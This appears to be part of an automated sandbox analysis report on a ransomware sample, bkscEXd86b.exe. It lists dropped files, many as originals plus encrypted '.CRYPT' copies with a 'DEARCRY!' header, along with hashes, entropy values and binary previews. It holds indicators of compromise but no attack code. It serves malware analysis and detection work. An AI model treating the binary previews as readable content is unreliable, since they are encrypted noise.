                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Caches\{FE0954D6-6B08-46D7-A05D-C49BC35F188E}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6112
                                                            Entropy (8bit):7.958270405682884
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FBF2899F948DF0996DDEFF49191AB9BA
                                                            SHA1:9A7992BBB1C82D70F2221A75F4854100E651634A
                                                            SHA-256:03D793AB1D1524A5305FAE10D1463C344198D37B30D84304A7C4DB433E6168E7
                                                            SHA-512:E57A2A5CB598B6AA845B6CFDE04D0576D17729FD38BAB3EAC41A73AE9D7BC184FF1905E31F8346D16E32C078D0EFE41BB6AE554E2AD7AB9088713B9585BF92F2
                                                            Malicious:false
                                                            Preview: DEARCRY!.......&m.wy8....9..Z..D......CrC.(.e...........#...P.u....L ..H.....N..I../.>.....68V..5.A......@..........^.t.G.....8..C.o.'...eB....?%.C.....wN..V.".E.9W...x.U...+q*'P......3.............$...]w.a....X...h"UH....s.`.7...2..b.~p....R9..).>...................sc..KK.9.G!i...f.0..`.tt..t....L5...Z..8.c5.....[.f.tM....6n...bu;....1..T...`..V./.....&6.[........@.0&.@=..G....(..>......BL........d..7.[s.....@2CMRR...*a.......N...<../..{..<. ..*,w...X...a..iI.<>...d.....H...."z...B...k............d.*....V.Q..h.F..?+A..O..@....!Q.:..d...V...3..|U.....Ej#W8..(..1.wd.(.....<G..M...5hQ..c.,.oI+..f.W..j.z..L......i...>iAq...}.....Y)/}.[@..?.;...,-.e.0...]/>q..)...7.sr.<...........|.....@...:.>D...h8..L.6.".[...v.s5.~..;..h.V....S../.C..N4.j$2.B._J.m.....n.Q.g....i..F....."...Y.... {p..Am.C..z.c.&/..pF.O...9a...Zr..3L...g.............-J.M7-...L.......0...{RE0..h.L.6.S......U.$..>"X21...D.).&8.-.....(.wH.vD(](.c.v_...0a.Q...!t...9.&/..E..#7.C..x
                                                            C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):721756
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DBD5045949F52B2A9C2A639FDDFFF098
                                                            SHA1:09F635732EEAAA5FBD41FBAFF72EE8123620DC11
                                                            SHA-256:5C4A097BEBDADB34C6A2633B37265FD5C9D424F652C5E13E4B84674F683C4CCD
                                                            SHA-512:C563F7D2CA2776F19887E179230D8A0EE76D05B4E704BFBC1A011B892C94801C0C13DB076A2F18BACC64D1D4683CDC1F82D5B0D888FF5518D7A9014A8853B17F
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):722040
                                                            Entropy (8bit):7.999743719262562
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:5EC7AC547B6EDBDF5408668F00816DCB
                                                            SHA1:488B73110BCB18DAA24FAD1EBFDEE4552B2DB821
                                                            SHA-256:F48FED3A6AACB44559C76F0FD2AF637A7084D4B6E1BA7521D65FB6EA8BE17F79
                                                            SHA-512:74EAE635A728AFE090351CE859D20E03E06C0131C7ED9F7BABAA818159753E2B056D43FB6E1A48C0AD49A86DB6AF5FAF3C7D163CFB181316CD8E1F925F978971
                                                            Malicious:true
                                                            Preview: DEARCRY!.....V......J,.....u.l...s..mn... ./..R..aA..w.........}&6....`.....m.;....eY..@.[...@N..F..f.....pv.....q....M..!..].]....E.... `{....63..h8....W......)`<...I@Tm*.6...y.i.BYv#;.Q..y..?^xH.y......y..%...........E4...j../L@.E......}5...a....1.[....\.......0i.i.}.m..X.....by$".4.......c..D....B......\.i.{..........]Qh.C...[.E5.b..H.O.M./..]W......F.T.U]j.-.mLZ..O..&....!,..\...H....&.o.m....=....N..B.ti.....:.........Q...X;.P.^w....k<.&.n.u<.....ZG..........}.z.q0..u.B..[|...T.:..-Hu2C.6.oo|.6.>p......<$.....c...g.....y.vw.o2.V+.M}....~-..^...?...sa.....X.H.O..}...6..348.).o.C.'......~..D..5..:w{....9.....<p6..Y..T..T{....y..y]G...@Y..OI..F.?..o.....cCk.....1..6.o.ua...,{3..g.8.u..~........H%..c..eD`..fn.....Oo...k.z..o.+Io.n......B.!.BD/.....V.J2..n.s........@..$Y."...h...%@..0.l......V.P3..4.~...}\:..?L.rx1....fA#52I....".*.<.A....E....{?.A.}..{........;.u|_...{.VC.`..g...#v..+...tG.g?..u7L.M...........OI.Ji......r....
                                                            C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):576
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DCCC781A9692F3F37CD61A0137E23445
                                                            SHA1:E6BC6987B0F49D8B73D0DFE93F4CC175D18D2DB5
                                                            SHA-256:F7B145D7A88BF1E9797EE9DEE992EBCA6882E9CFB418C518A8AA0B6A29D94F4C
                                                            SHA-512:884DA25995C7F01DE615546691A75A796EC66E356C6DE519A8C284C446B92B38A9ACF7A548D4FDD5D41F24F2F941E94279904BB1BEE7964DE7830E1926657622
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):872
                                                            Entropy (8bit):7.702584949590397
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9AA88DFCAA42C260B59B7EB2340F1E94
                                                            SHA1:951413E3CB6AA0E4D104D687BBD99E00148561F5
                                                            SHA-256:79012F8237488D1E242A42CE343F771CBBF08E59122F83E2F000E70725C487C1
                                                            SHA-512:457130C9F027C8945CD4B607543D47D575A412B475C068D30143F173A6CA06AE211A55EDBE333BDEADF6B412875AF4E34D7F9A2BBBC0DB056F437D6253B75DA6
                                                            Malicious:false
                                                            Preview: DEARCRY!....V.t.ZM......Y...K...[u.1-.g..T.~...t..LI.z...Ot......^@....x..+...3..3..l.Xj..#Ym#...8.......p.U...D....=l..,.fe+T.W..]....wf.Y2Q..&....b..$.......2.9.x...... .DUj.;#.b......PW.[0...avLi......7..7...V]*..|..1H.\<...~.F...TVP[x..#....?...b.&......@.........r.F.r........I.D...<...Kj.2.ot....#....w.K@..c'...#..........#......p..T.[F..XTP2....F......./g.Q*....S..a..d.3p!..LC#R=...#..G..$.A/.t..89..r.B...+.#..k"..,.U...P.....c.kmF.b+..6......+.l_.e........3.0;YW.B....x.=.VO6.k.....u........O;.8?Q..|........g(.G#Io%..4....I`h...,.m..3.....s.,....P..+.0E0..F.;.../.+.Q.k......................N......`}.[...T .A&...s.^.4....U.&n.l.j.._.V..R.m.L.!...F.......P.u....7}q..d..........."..D.#~q...z.v.9'.....YI..x;sA.g..~.G......(I..qpAY....]...>.ZF'.l~..4..x..EV..`..#S.$~....=...4.$.L....|...m.$...ou...!}Nr.Q
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):370
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D9F0A9D8ABC914943BDE2E21B6E810B1
                                                            SHA1:23B78362ED8FBF9EC778507E091D1EDB82C802AC
                                                            SHA-256:C3FDCB51036653B9FC643DEF9DA6B1992A45485D21211C97A32F7ED451A6A1E7
                                                            SHA-512:B67FB9CB4A407016D50E508F4742004656B6F7F345C8F058D89B22A5248B442EA449B7292458ED9FC3220E6CBFD91C8E8B7CF3B969DBC88E16A6B004853CD6E1
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):664
                                                            Entropy (8bit):7.713005330614933
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BEBA8C92B8131F42BE499090F44A495B
                                                            SHA1:A5FFC502DE8B8EECA52E782097767DD140874089
                                                            SHA-256:B7FD11CACDBDFDB7C22FB64EF1E3F7B261782191E2C5AB99FD4A8F1319DD745F
                                                            SHA-512:DBD28501F465FBAD8F67ACA7CAF89B262E7B5B7D6123BF52C6BD95C4F311A1CEE9BFDFB64A7C4E76357AE3BE6887B621788420FC7BCCEBDEB986A6D5671D48A5
                                                            Malicious:false
                                                            Preview: DEARCRY!..........N**9]!../..,.p.....u..D....-...._-...(.g..I....W..J...'....`.h...m."fW.........D.....\u..A.!.,v.".\..ec.I......L`..A\. B.k...m.........^.i.*)...Ms.{V..Rx{...{.x.)..).4...NV.F.......'.(....Q.<.....pC.....y....(C&.l..W...ex...r.\....(LL....r.......X...F...7C.....*+..Y...J..ZTMunU."...O.)..lW..N.R.?;.e...x.goz.5.......i.....w.r=@q..6k...l.......>O...d6..q\X!.P.\>...M..E.......B.m.....W.Cc[.2y....j.H....n..P...@....R4......6..T..LrWe....w..[_y..q+..;........T.^D\.R......7....|;...lL..!..4.'Cu.....;..PT.8..{\.0z..AKQ.m..=:.....eT..w.L...#.....G!.`%...@..t.9v4....X..L....>..H.qd...Z.[.Xp.\gA6.o.s..,.....S.?G...U..
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):85
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E956031D7BFE0E613C86B6D27FD126A0
                                                            SHA1:BCC9FE3FFF88FF66DF70C1E53401A28C5873BD63
                                                            SHA-256:6C99E32B005A3A4956B9406AB15411E666C7F67982DB170AE1FB111EC634B9C4
                                                            SHA-512:AA4ACFF27639061E8FA9A93D69D7DDCB0C4153B3C6657451D2120A4BEB262A96A5550AA4BEDC866258AD1ED35CD2392949B556A3F1C5402B95F7CBBA7309AB6D
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.351144446100854
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B838AEC8B5481A137A2394EB4623F741
                                                            SHA1:0E87F72B3AADE885539F3BF52331EBBDC85A79C0
                                                            SHA-256:0C1B38C13A819976D100DA91DE9BE030C25DB6A2A91AF2EFEC09806D4AE72649
                                                            SHA-512:3DD0FBB8DDA3DFE94F6F7B2D14D031D77A316EA4BC98DE781D3D2DA382D70725D8FA5C3A1647FF27309254A9AB985938E73B06AB902327FE991C34EA8BC662FC
                                                            Malicious:false
                                                            Preview: DEARCRY!.....p..\UB...j."..............1..\Pof.6.N.....6...T....0W.u8..d.j\Z...........l.u...............9.M.=_..7*f-I....[...Xc..U.x...w...8yQ[.R...V...pf........D.K2D.........,X......s..!x....Wp;=..rU)C..x.n.(.G....._+.............N.[....4.e....d.......U.......sp....t.}....U4.......#.4`W..e.....G.....(.v-......hnA$.(_k.I...g.....Nq.).[q....kq.|e.
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1362
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AD18E43AA3B981A732FDEE527C505190
                                                            SHA1:7FA986E0BB92F786437D9734F3DD462E396F4425
                                                            SHA-256:14CCCDE0BC083B9D329FDDC339F7B4C17B293DA99555A491488FF8E9DC660F8B
                                                            SHA-512:6A5AB416FB7BA6ED98A3184A2519033D4935AC9CC50E149B03532C144CEB48D6317BBE8EDE009D094B4B52EC115772199FE11919F69CC89AA358455B74CB89CA
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1656
                                                            Entropy (8bit):7.869358619641375
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:015C5E7B6577B07FC3D77D4A6288BF48
                                                            SHA1:B214F958B98011338B4D20500B19212596F2F586
                                                            SHA-256:854E124A036DC9C29140778B649C9FE18DC8520BFC9627863F1794F3C444A6DC
                                                            SHA-512:8DC1C7031ECA37059D3EE612946F815F2C97490E27263A9821D125FBD817CC275F8BDC1B1C25D8152DAC9F29E1085A956FE5EA942E7DA8EAB9D3A0A47043F516
                                                            Malicious:false
                                                            Preview: DEARCRY!.....9....5.-....r%bm...-.M..@....9`..=.&.<.W..(.&p.f+.V.....9....kjJ5...~..^,....7.{..D6....3.........`.\.o.Y..0.4...u.^l......;F......;j>&.J..0TwJ.;....$.V.....3.Pg._3.....8.f.&8.....7...3~.....5.......p..#w.G..xvi..;..h..6Y|Ye....*.x>.p.........R........L.....T..@.=..n...nmla.......Z..8.I....,z...c.......R......_"...pra..E}.}..r6.`.YU..o-..P....[...........w*.Tj..W]...g.ag.9A.p?.Q..&.....X.Mh....?.X..+u`....3.....(....7.!>t..-i...%.-=.B.O.."....k..U.<....3.D[.@.....?|.0...4.......^E..p.O.*..m...T..)........y...4H..<..[...........p~)..L4.t.../b...... 5.c....ZM...D.1n..Q.R.&..Ey=o.Cz...V..]._..T.F.3...}?....D>.c..9.6.K......>..<..j..U..V|..~d....A...`.~'C.rR...w...6kK.DA.+..B..1.I...;..|.t(C.t....G.W.r\X.X.%..{.U..9$ka;.....e..fsA{d.q..X......A..Mr....@......d..M.5.....?..D7.U(<....f/_....c....S.Tw..[..qk..El.)....C.b.4L..-......7.PNd.V#P[ -....{.d.Aj9..ru..+..M..J#.5.p......<..~APD.?.#[..U]...n..w.#..+~a.2...&.X..
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):27460
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:237979342DC81BE0421EB7D3BC12F4DE
                                                            SHA1:77E4981A86522E5D821E611606C4CD6DE1253B57
                                                            SHA-256:0FDD1BCAD0F9A37FB03A6F70B62565296536A1A4E6CE3852E43788A08195C5B5
                                                            SHA-512:CECD9F10975A7E729B8D8E621F676C7AB5947C6649CC614219ADC2C086DAEA4B7DBEC53DAA0BA230D6E2F9DE9ACB60BDB47AB0C8551DAD1BAE439B45FAF35B13
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):30320
                                                            Entropy (8bit):7.991800743451044
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:7836EB8316B97B204B5574FFBCABCE4E
                                                            SHA1:E07CDEBEFAC322FD31FEEA9729A3E8BF2402DAF4
                                                            SHA-256:392AC123D6D310BF34EFBE7B8B59443BBC6BAF80C976D67E59FDCAE9B74DD2DD
                                                            SHA-512:A9DA8685CA7A04AE6D4911E799C6A7BF3A3ED2D5111A3F4413C6379B3B3578EA402F5B65C4DEF14E4D10EA7E73BA09AC2BEEC6EF6DAB697172174ADC158DB86F
                                                            Malicious:true
                                                            Preview: DEARCRY!......1.a..1..TW.s.....o..Pg......R.b..{o........./9w..(.oP......a...7E.,....R.".].....a.4\.,.>...f.Dr..k%....]2...AK..:...S.0.1.M.s.Y5\..O...e...6...N..`c.<..g...Y...C.*A..A..^...p.[.|&..v;L....G...o.{H.V.'.G....7;r.~.*.#kz...F...}(..;*...hi....Z.......................g.......E...x..#..8rK.-..B.....L........> ......8........~.X.o....f.n.p(.....Am..x.Z..!.............".gWLAH.. .E.c...{fq.K.U.qk8.W.^i.....D..O.....A..'6o.|.,.|.s.H...k...P..;.....n..-..S.m.Z..}%.NA.d1 c...E....Y....$7...Fuz..D]_]!.dM&..M..U.?..~Rm...U..t.b&.'IB....c...`[.G.s+.5w.p8.u......."J...g....5.......@.\).kK..c7E.;.u......|./...$...."</.....!*.!2.....#@s.$.}.K....$>.=8.....x......q4.....V'5BG..=qft.2..&...ymR]z,Y.(v....&fDL.dB....cN...%....E..s......Ya.j.i.....B.Q4e....zZsx.......].. 2.......0.....{n.#.....C......1..!.#Yf/l.^}...#.R.j{.n*(#...$....*0..9O.5v......Z._.g..jE....x+..x.....6.t..t.aeU;&J....X.y}Mr4.A...8....v...J..jp..Mw0...AN.3I....._...3/|H4..)......F.I
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):170
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C5F74317E9F328452E4240295B6229FB
                                                            SHA1:79169F0F0A049A094AD818B8E4717CF43FCBBF98
                                                            SHA-256:7E5112B5DB200307FE7148CBF8CC0BB8F2F520EFE3BC902D72C226B5BDBCA0B8
                                                            SHA-512:E2EDD7C91D35677EE83403E93468C9F51B00B556E644929F0509DD6DFBE920FAC685B7F48A2339A081A30AF68EEFE667BDCF6403AB38490B89B97E0CF0DC03D6
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.394941024666915
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5D43F5A83F845E0703DF72CC21FE53E2
                                                            SHA1:E463E2A13D64ECA4E23DCDDCA96FDC34BF49038D
                                                            SHA-256:BF137D1F09002F8298FCA59A10B2C6DFC5F70574ECA504655E64768AC8A1A1A2
                                                            SHA-512:F4C4D276D5AFBBBE007305DA986B3D3C11460D1226325B0183B72CD0002C8678A38308ED0E55155336318A456C6627B544F51B0749FAB65CEDC5941093525A3B
                                                            Malicious:false
